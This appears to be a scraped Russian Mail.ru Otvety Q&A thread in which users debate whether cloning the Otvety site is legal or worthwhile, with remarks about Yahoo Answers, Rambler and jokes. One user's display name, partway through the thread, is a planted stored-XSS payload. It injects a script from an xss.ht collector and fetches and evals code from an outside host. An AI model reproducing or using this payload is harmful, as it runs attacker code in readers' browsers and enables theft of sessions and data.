Что мне за это будет? Что скажут хозяева?

Romale Мыслитель (8995), закрыт 16 лет назад
У меня есть возможнось сделать клон проекта ОТВЕТЫ. И даже особо стараться не буду, чтобы сильно отличалось внешни и по смыслу.
Дополнен 16 лет назад
украсть не так сложнео ))))))))))))
Дополнен 16 лет назад
А если РАМБЛЕР возмётся за это?
Дополнен 16 лет назад
Я согласен , популярность из-за почтовика , хоть один не имея , почту на майле , слышал про этот проект? и только из-за него завёл сдесь почту? очень мало таких я думаю.
Лучший ответ
Байт Эксперт пока не указал должность 16 лет назад
Ну делайте, кто вам мешает?
Всё равно не будет такой аудитории как на Мэйле.
RomaleМыслитель (8995) 16 лет назад
спасибо за разрешение вы в России в не конкуренции это-факт! )))
за ТРЕЗВОСТЬ!Просветленный (29909) 16 лет назад
Чего вы так серьёзно воспринимаете =), он же шутит...
Байт "><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) А я никак вообще не воспринимаю. Даже не задумываюсь, какой смысл?
Остальные ответы
Кабан Ученик (185) 16 лет назад
Я тоже могу это сделать, но мне это не нужно! Если ты это сделаешь, возможно будут судебные дела возбуждаться, тебе это надо?? ? Создай свой авторский проект, - все проблемы будут решены!
RomaleМыслитель (8995) 16 лет назад
а как на счёт того что они первые были http://answers.yahoo.com/;_ylc=X3oDMTFsNTBlcDVhBF9TAzI3MTYxNDkEX3MDMzk2NTQ1MTAzBHNlYwNmcF90cm91Z2gEc2xrA2Fuc3dlcnNsaW5r
PunisheR Просветленный (25589) 16 лет назад
видимо посмотрев исходник страницы и скопировав его на своем компе ты посчитал себя гением. но не все так просто.

нарушение авторских прав. твой сайт грохнут. наверно
Источник: http://otvet.mail.ru/question/2618602/#21038323
RomaleМыслитель (8995) 16 лет назад
чтобы сделать такой проект гением не надо быть ))))))
сначала сделай сам с нуля, разрабатывай год, сам продумай интерфейс, возможности, развитие, привлеки несколько миллионов пользователей... а потом поговорим про гениев :) твой вопрос далеко не первый в этом роде, а вот адекватных российских аналогов ответам что-то до сих пор не видать :)
1 Гений (63433) 16 лет назад
по закону это можно сделать через 70 лет с момента опубликования. иначе это воровство интеллектуальной собственности и жестоко преследуется по закону. так что лучше не рисковать
Cледующий! СПросветленный (22997) 16 лет назад
Со всем уваженияем, но я слишком часто вижу аватр кота в ответах, где скопированный текст (слово в слово) с мэйловских правил. Не ссылка, а текст. Так что вы то же воруете.
1 Гений (63433) но это же не является нарушением авторских прав. во-первых, копирование происходит в рамках проекта, на его же страницах во-вторых, материальной выгоды в этом нет и в третьих, цитаты с указанием источника (а то, что эти вопросы в подкатегории "О проектах мейл.ру", уже говорит о цитировании правил САМОГО ПРОЕКТА) нарушением авторского права не являются
RomaleМыслитель (8995) 16 лет назад
А ты в курсе тогда на маил надо в суд подать и в суд подать должен Yahoo поскольку проект гораздо раньше сделала. Ну если конечно Маил не отстёгивает им.
RomaleМыслитель (8995) 16 лет назад
http://answers.yahoo.com/;_ylc=X3oDMTFsNTBlcDVhBF9TAzI3MTYxNDkEX3MDMzk2NTQ1MTAzBHNlYwNmcF90cm91Z2gEc2xrA2Fuc3dlcnNsaW5r познокомся с первыми )))))))))
1 Гений (63433) Ром, там скорее всего были куплены права, иначе этот сайт давно бы закрыли, а разработчиков засудили.
Sempron Гуру (3471) 16 лет назад
Латыши сделали.. . :) И насколько я знаю, ничего им за это не было.. . Хотя Байт и ругался, что они скоммуниздили ответы.. . :) Хотя надо признать, что внешне латвийские ответы заметно отличаются от майла.. . да и в содержании есть различия...
Ultimo RatioМыслитель (9162) 16 лет назад
А сайт знаете?
http://ru.irc.lv/qna
RomaleМыслитель (8995) 16 лет назад
самые первые были Yahoo. http://answers.yahoo.com/;_ylc=X3oDMTFsNTBlcDVhBF9TAzI3MTYxNDkEX3MDMzk2NTQ1MTAzBHNlYwNmcF90cm91Z2gEc2xrA2Fuc3dlcnNsaW5r
ну-ну :)) первые :))
СауронПросветленный (23514) 16 лет назад
Ещё вопрос, кто там чего скоммуниздил. Мэйловсий "мой мир" слизан с латышских ответов.))))
А скорее всего, делали те же исполнители, но под более грамотным руководством. Реализовано очень похоже, но шеф был на порядок умнее здешнего. В итоге глюков на порядок меньше, почта закрыта от посторонних и масса мелких удобств для юзеров, на которые здесь плюют.
Возможно... но я не пользуюсь Моим миром ни там ни здесь...А вот в самих Ответах там есть некоторые возможности, которых нет здесь... Например оценка ответов...
Татьяна Мыслитель (5262) 16 лет назад
Вот это вопросик... сколько уважаемых людей собрал... Клон всегда отличается от оригинала тем, что в нем нет души... Так что хозяевам действительно без разницы, что ты с ним будешь делать...
RomaleМыслитель (8995) 16 лет назад
Но если говорят что проект ответы в каждой стране есть , так кто же из них клон ?
Татьяна Мыслитель (5262) В принципе, какая разница? Здесь собираются русскоязычные и неплохо проводят время...А клон это, или не клон - думаю никого особо не волнует...
ТатьянаМыслитель (5262) 16 лет назад
Душа...мы ее свою сюда вкладываем...
Максим Нестеренко Мудрец (15286) 16 лет назад
это не так просто, как кажется.... хотя и возможно.. . вопрос в том - а это надо? ведь можно сделать что-то подобное, чего нет и что будет пользоваться спросом :)
Ведь делать то, что УЖЕ есть - даже не очень интересно :))
украсть - несложно, но ведь и неинтересно!
Alex Vito Мыслитель (8480) 16 лет назад
Лёшка Попович, не мудри
Славика Мудрец (15549) 16 лет назад
Каждый может, но попробуй раскрутить!! ! это не два пальца..
RomaleМыслитель (8995) 16 лет назад
А если РАМБЛЕР возмётся за это?
Swetik Мастер (1465) 16 лет назад
коварные замыслы наказуемы!
kp Просветленный (32773) 16 лет назад
дык этот проект тоже клон ответов на яху и гугле =) Идея не нова

и кстати популярность наших ответов связана с популярностью не проекта ответы, как токогово, а с популярностью сайта-почтовика
RomaleМыслитель (8995) 16 лет назад
А если РАМБЛЕР возмётся за это? Маил голову зачешет? ведь это будет второй мощный русский сервер каторый может создать конкуренцую
kp Просветленный (32773) на рамблере придумали другое - аську раскручивают =) Кто что придумавает для привлечения аудитории...
) Гуру (2822) 16 лет назад
Как только сделаешь не забудь нас пригласить.
Leila666 Мастер (2182) 16 лет назад
не надо. пусть эти ответы останутся единственными и неповторимыми
Katrin Voit Профи (792) 16 лет назад
блин, что ж людям-то спокойно не живётся....
Sky7FoxМудрец (14183) 16 лет назад
Зачем ходить по лесу утром
И в руки собирать росу?
Сиди себе спокойно дома
И кушай с хлебом колбасу...
RomaleМыслитель (8995) 16 лет назад
Респект Sky7Fox за стишёк
lubov Мудрец (13280) 16 лет назад
а придумать свое что-нибудь оригинальное - никак???
елена Мудрец (14589) 16 лет назад
не.... здесь уже баллы.... не знаю, зачем они.... но все же.. . честно заработанные....
мамаша Куражжжж Просветленный (40887) 16 лет назад
я ела б суши вместо сала
но мне они не ндравятца!!! !
тебя посодют а ты не воруй! !
с другой стороны -
любить так королеву
воровать так мильены
сидеть так пожизнено)))))))))))))
Максим Березань Профи (866) 16 лет назад
Чувак попробуй никто тебя за это не убьет.. .
Лично я буду рад за тебя...